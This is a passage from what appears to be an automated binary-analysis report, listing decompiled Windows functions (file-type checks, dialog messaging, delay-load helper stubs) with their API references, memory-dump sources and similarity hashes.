					if(_t3 == 2 || _t3 == 3) {
						return 1;
					} else {
						return 0;
					}
				} else {
					return 0;
				}
			}




                            0x009e9749
                            0x009e9751
                            0x009e975a
                            0x009e9767
                            0x009e9761
                            0x009e9763
                            0x009e9763
                            0x009e974b
                            0x009e974d
                            0x009e974d

                            APIs
                            • GetFileType.KERNELBASE(000000FF,009E9683), ref: 009E9751
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FileType
                            • String ID:
                            • API String ID: 3081899298-0
                            • Opcode ID: 16c7bb85cfb3af575e13b91458b8fb72a1e53bcb8aa180e3af060c66481e359c
                            • Instruction ID: b6d39a3f86468959bea43f8b3637aa4521e23e90f18d8b1f44a936509dbd2c8e
                            • Opcode Fuzzy Hash: 16c7bb85cfb3af575e13b91458b8fb72a1e53bcb8aa180e3af060c66481e359c
                            • Instruction Fuzzy Hash: C1D01230031280958F325E394E0909966599F433A6738C6A4D025C40B2C723CC47F600
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FC9FE, Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E009FC9FE(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				void* _t7;

				SendDlgItemMessageW( *0xa275c8, 0x6a, 0x402, E009EF749(_a20, _a24, _a28, _a32), 0); // executed
				_t7 = E009FA388(); // executed
				return _t7;
			}




                            0x009fca23
                            0x009fca29
                            0x009fca2e

                            APIs
                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 009FCA23
                              • Part of subcall function 009FA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 009FA399
                              • Part of subcall function 009FA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 009FA3AA
                              • Part of subcall function 009FA388: IsDialogMessageW.USER32(000201B4,?), ref: 009FA3BE
                              • Part of subcall function 009FA388: TranslateMessage.USER32(?), ref: 009FA3CC
                              • Part of subcall function 009FA388: DispatchMessageW.USER32(?), ref: 009FA3D6
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                            • String ID:
                            • API String ID: 897784432-0
                            • Opcode ID: fbbe1a76df2e933ed33663c656e910281d160ae406a275cbde2293ae77d29ef0
                            • Instruction ID: 8418b2b9e8c0e7872520c2ca9dc33367fb2ae8b88e047beea6078fa6fa2d7b08
                            • Opcode Fuzzy Hash: fbbe1a76df2e933ed33663c656e910281d160ae406a275cbde2293ae77d29ef0
                            • Instruction Fuzzy Hash: D0D09E76144300BAD7126B91CE07F1E7BB2AB8CB04F004554B345740B1C662AE329B16
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FD1BF, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E009FD1BF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E009FD53A(_t3, _t4, _t8, _t9, _t10, 0xa1ab6c, 0xa1df10); // executed
				goto __eax;
			}








                            0x009fd1ae
                            0x009fd1b6
                            0x009fd1bd

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 009FD1B6
                              • Part of subcall function 009FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FD5B7
                              • Part of subcall function 009FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FD5C8
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                            • String ID:
                            • API String ID: 1269201914-0
                            • Opcode ID: 2465849236f400afc5c0a26cef7055780072a4cfb77e750cf6668103dd6fd089
                            • Instruction ID: 0961d9fa0fe36550514b2d961b040335cd54530ebfceed19066cb184e6cb17fd
                            • Opcode Fuzzy Hash: 2465849236f400afc5c0a26cef7055780072a4cfb77e750cf6668103dd6fd089
                            • Instruction Fuzzy Hash: 90B0128175F004BC310871446C02D77020FE4C0B243308C1EF10DC008CD4414D810232
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FD1A4, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E009FD1A4() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E009FD53A(_t3, _t4, _t8, _t9, _t10, 0xa1ab6c, 0xa1df08); // executed
				goto __eax;
			}








                            0x009fd1ae
                            0x009fd1b6
                            0x009fd1bd

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 009FD1B6
                              • Part of subcall function 009FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FD5B7
                              • Part of subcall function 009FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FD5C8
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                            • String ID:
                            • API String ID: 1269201914-0
                            • Opcode ID: 20226a77692b7f33cbb5bacebfb7dba42db46536d0be4570f2e9a3be2b2ed991
                            • Instruction ID: 3740d09190643fe2607d508287875932a38e20bb3a284568943d22b3699aa000
                            • Opcode Fuzzy Hash: 20226a77692b7f33cbb5bacebfb7dba42db46536d0be4570f2e9a3be2b2ed991
                            • Instruction Fuzzy Hash: 35B0128579F108BC31083140ED02C77020FD5C0B24330891AF109C008494454DC10132
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FD1DD, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E009FD1DD() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E009FD53A(_t3, _t4, _t8, _t9, _t10, 0xa1ab6c, 0xa1df04); // executed
				goto __eax;
			}








                            0x009fd1ae
                            0x009fd1b6
                            0x009fd1bd

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 009FD1B6
                              • Part of subcall function 009FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FD5B7
                              • Part of subcall function 009FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FD5C8
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                            • String ID:
                            • API String ID: 1269201914-0
                            • Opcode ID: e09ba33f1484f4e76f4215a6793c8b37f2599efd05e2660491af4e9416d2fe4b
                            • Instruction ID: ab9b2415dc96e54d7cddddeb68cb166da4948c71a93e510e8f59a602154aec48
                            • Opcode Fuzzy Hash: e09ba33f1484f4e76f4215a6793c8b37f2599efd05e2660491af4e9416d2fe4b
                            • Instruction Fuzzy Hash: 1CB0128575F004BC310871446D02D77030FD4C0B24330881AF10DC1044D4424D820232
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FD1C9, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E009FD1C9() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E009FD53A(_t3, _t4, _t8, _t9, _t10, 0xa1ab6c, 0xa1df0c); // executed
				goto __eax;
			}








                            0x009fd1ae
                            0x009fd1b6
                            0x009fd1bd

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 009FD1B6
                              • Part of subcall function 009FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FD5B7
                              • Part of subcall function 009FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FD5C8
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                            • String ID:
                            • API String ID: 1269201914-0
                            • Opcode ID: dfc8f2ecbcabb1d19ab7efcb60cd122b84b34a590432cda3d9cf9e04e9b6cf0f
                            • Instruction ID: 42457d5e6c306ca50b9e04c923ede97ecf4d8a99b4dd4e71914901695207f346
                            • Opcode Fuzzy Hash: dfc8f2ecbcabb1d19ab7efcb60cd122b84b34a590432cda3d9cf9e04e9b6cf0f
                            • Instruction Fuzzy Hash: 03B0128575F104BC310871446C02E77031FD4C0B24330C81AF50DC1044D4414D810232
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FD205, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E009FD205() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E009FD53A(_t3, _t4, _t8, _t9, _t10, 0xa1ab8c, 0xa1dff8); // executed
				goto __eax;
			}








                            0x009fd20f
                            0x009fd217
                            0x009fd21e

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 009FD217
                              • Part of subcall function 009FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FD5B7
                              • Part of subcall function 009FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FD5C8
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                            • String ID:
                            • API String ID: 1269201914-0
                            • Opcode ID: 006b142871023f065b1a8c9afe6aa483b08af86d322d0cc6c323fad09538fdf2
                            • Instruction ID: 0f0d852ba85865770333bf277e503fd8036923c742e5dbbbb71b53cda9454802
                            • Opcode Fuzzy Hash: 006b142871023f065b1a8c9afe6aa483b08af86d322d0cc6c323fad09538fdf2
                            • Instruction Fuzzy Hash: D2B012C629F114BC310411846C06DB6030FE5D0F283308A1AF121C408894588EC10172
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FD23E, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E009FD23E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E009FD53A(_t3, _t4, _t8, _t9, _t10, 0xa1ab8c, 0xa1dff0); // executed
				goto __eax;
			}








                            0x009fd20f
                            0x009fd217
                            0x009fd21e

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 009FD217
                              • Part of subcall function 009FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FD5B7
                              • Part of subcall function 009FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FD5C8
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                            • String ID:
                            • API String ID: 1269201914-0
                            • Opcode ID: 4684a82567d3e94b55edb77f5d22d1da0a69c43608026d914e7c4a556559a925
                            • Instruction ID: ed7a86880a89502a544d9ad13c8d45de66d39e4ae44d39a685f205a0dc1d09d0
                            • Opcode Fuzzy Hash: 4684a82567d3e94b55edb77f5d22d1da0a69c43608026d914e7c4a556559a925
                            • Instruction Fuzzy Hash: CDB012C629F014BC310451886C06FB6030FF4D0B28330891AF115C5048D4548E810272
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FD234, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E009FD234() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E009FD53A(_t3, _t4, _t8, _t9, _t10, 0xa1ab8c, 0xa1dffc); // executed
				goto __eax;
			}








                            0x009fd20f
                            0x009fd217
                            0x009fd21e

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 009FD217
                              • Part of subcall function 009FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FD5B7
                              • Part of subcall function 009FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FD5C8
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                            • String ID:
                            • API String ID: 1269201914-0
                            • Opcode ID: 8a683dece4a2013206abc11dc91dd13c99dfde5f5acdc1987d91067f61c5d42b
                            • Instruction ID: a091760ae16d470bf7abcb4f8da4a4d53d8ad77593ec74ed6f6513e592771bd9
                            • Opcode Fuzzy Hash: 8a683dece4a2013206abc11dc91dd13c99dfde5f5acdc1987d91067f61c5d42b
                            • Instruction Fuzzy Hash: 38B012C629F014BC310451886C06FB6030FE4D0B28330C91AF515C5044D4548E810272
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FD7DA, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                            Download Yara Rule
                            C-Code - Quality: 58%
                            			E009FD7DA() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E009FD53A(_t3, _t4, _t8, _t9, _t10, 0xa1abcc, 0xa1deb4); // executed
				goto __eax;
			}








                            0x009fd7e4
                            0x009fd7ec
                            0x009fd7f3

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 009FD7EC
                              • Part of subcall function 009FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FD5B7
                              • Part of subcall function 009FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FD5C8
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                            • String ID:
                            • API String ID: 1269201914-0
                            • Opcode ID: 6690f67f844860d2775187cde3c2b7a17961b2a740c97391554a1e90c0e19d60
                            • Instruction ID: 7f40b08cc54deb68d85a8c5172345af9dacffe5b93c8191b70eeee2999da47ea
                            • Opcode Fuzzy Hash: 6690f67f844860d2775187cde3c2b7a17961b2a740c97391554a1e90c0e19d60
                            • Instruction Fuzzy Hash: 67B012C125F006FD320471416F02C76030FD8E0B1D330881BF100C808894419C810132
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FD1D8, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                            Download Yara Rule
                            C-Code - Quality: 22%
                            			E009FD1D8() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa1ab6c); // executed
				E009FD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                            0x009fd1b1
                            0x009fd1b6
                            0x009fd1bd

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 009FD1B6
                              • Part of subcall function 009FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FD5B7
                              • Part of subcall function 009FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FD5C8
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                            • String ID:
                            • API String ID: 1269201914-0
                            • Opcode ID: 05bae710352a1bf72a08c0c0114962430b3addfc072280abfd4120f7b2876be1
                            • Instruction ID: 17592a751790d3ac3b45405e2f277d70134c512d0226e2d9ca302ce882376d17
                            • Opcode Fuzzy Hash: 05bae710352a1bf72a08c0c0114962430b3addfc072280abfd4120f7b2876be1
                            • Instruction Fuzzy Hash: EDA00196BAF14ABC31097291AD06D7B021FE8D5B693708D5AF60A84089A8865D851236
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FD1F6, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                            Download Yara Rule
                            C-Code - Quality: 22%
                            			E009FD1F6() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa1ab6c); // executed
				E009FD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                            0x009fd1b1
                            0x009fd1b6
                            0x009fd1bd

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 009FD1B6
                              • Part of subcall function 009FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FD5B7
                              • Part of subcall function 009FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FD5C8
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                            • String ID:
                            • API String ID: 1269201914-0
                            • Opcode ID: 2539b6de552d7e3a4d73a41e3f7bd713b3821ec97e1a4fb952e1c30090eb38cc
                            • Instruction ID: 17592a751790d3ac3b45405e2f277d70134c512d0226e2d9ca302ce882376d17
                            • Opcode Fuzzy Hash: 2539b6de552d7e3a4d73a41e3f7bd713b3821ec97e1a4fb952e1c30090eb38cc
                            • Instruction Fuzzy Hash: EDA00196BAF14ABC31097291AD06D7B021FE8D5B693708D5AF60A84089A8865D851236
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FD1EC, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                            Download Yara Rule
                            C-Code - Quality: 22%
                            			E009FD1EC() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa1ab6c); // executed
				E009FD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                            0x009fd1b1
                            0x009fd1b6
                            0x009fd1bd

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 009FD1B6
                              • Part of subcall function 009FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FD5B7
                              • Part of subcall function 009FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FD5C8
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                            • String ID:
                            • API String ID: 1269201914-0
                            • Opcode ID: 909f32d2f45a2f34ef61ef796bc5235ce23b155f66e64b47dac34481914f4f3f
                            • Instruction ID: 17592a751790d3ac3b45405e2f277d70134c512d0226e2d9ca302ce882376d17
                            • Opcode Fuzzy Hash: 909f32d2f45a2f34ef61ef796bc5235ce23b155f66e64b47dac34481914f4f3f
                            • Instruction Fuzzy Hash: EDA00196BAF14ABC31097291AD06D7B021FE8D5B693708D5AF60A84089A8865D851236
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FD200, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                            Download Yara Rule
                            C-Code - Quality: 22%
                            			E009FD200() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa1ab6c); // executed
				E009FD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                            0x009fd1b1
                            0x009fd1b6
                            0x009fd1bd

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 009FD1B6
                              • Part of subcall function 009FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FD5B7
                              • Part of subcall function 009FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FD5C8
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                            • String ID:
                            • API String ID: 1269201914-0
                            • Opcode ID: 8b2afcbddd45bd79724c9a6cd98df6aa39db007f073c90a88158b8284ddf855a
                            • Instruction ID: 17592a751790d3ac3b45405e2f277d70134c512d0226e2d9ca302ce882376d17
                            • Opcode Fuzzy Hash: 8b2afcbddd45bd79724c9a6cd98df6aa39db007f073c90a88158b8284ddf855a
                            • Instruction Fuzzy Hash: EDA00196BAF14ABC31097291AD06D7B021FE8D5B693708D5AF60A84089A8865D851236
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FD22F, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                            Download Yara Rule
                            C-Code - Quality: 22%
                            			E009FD22F() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t7;
				void* _t8;

				_push(0xa1ab8c); // executed
				E009FD53A(_t2, _t3, _t6, _t7, _t8); // executed
				goto __eax;
			}








                            0x009fd212
                            0x009fd217
                            0x009fd21e

                            APIs
                            • ___delayLoadHelper2@8.DELAYIMP ref: 009FD217
                              • Part of subcall function 009FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FD5B7
                              • Part of subcall function 009FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FD5C8
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
